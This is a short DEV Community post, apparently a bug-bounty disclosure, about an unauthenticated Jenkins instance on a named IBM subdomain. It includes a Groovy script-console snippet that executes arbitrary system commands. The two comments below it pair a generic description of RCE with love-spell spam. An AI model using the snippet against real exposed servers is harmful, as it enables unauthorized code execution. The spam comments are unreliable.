DEV Community

Cover image for Remote Code Execution on ibm.com subdomain
Khaled Nassar
Khaled Nassar

Posted on

Remote Code Execution on ibm.com subdomain

i've found Jenkins on acc11-blr-dev-01.sl1694431.sl.edst.ibm.com does not require authentication for access dashboard

what can i do with this .?


everything , add/delete admin accounts,service,configuration,etc ..

but the intersing path is /script , you can write Jenkins script
so you can write script for execute system commands

def command = "YOUR_COMMAND"
def proc = command.execute()
proc.waitFor()
println "Process exit code: ${proc.exitValue()}"
println "Std Err: ${proc.err.text}"
println "Std Out: ${proc.in.text}"
Enter fullscreen mode Exit fullscreen mode

Thanks

Top comments (2)

Collapse
 
donnalnman profile image
DonnaLnman

Remote code execution is a cyber-attack in which an attacker can execute commands remotely on another person's computing device. RCEs are usually caused by malicious malware downloaded by the host Spells to make him love you forever

Collapse
 
freyapachl1 profile image
FreyaPachl

Remote code execution is usually accomplished by spawning a remote command shell that allows the attacker to execute operating system commands on the target system. Make someone miss you spell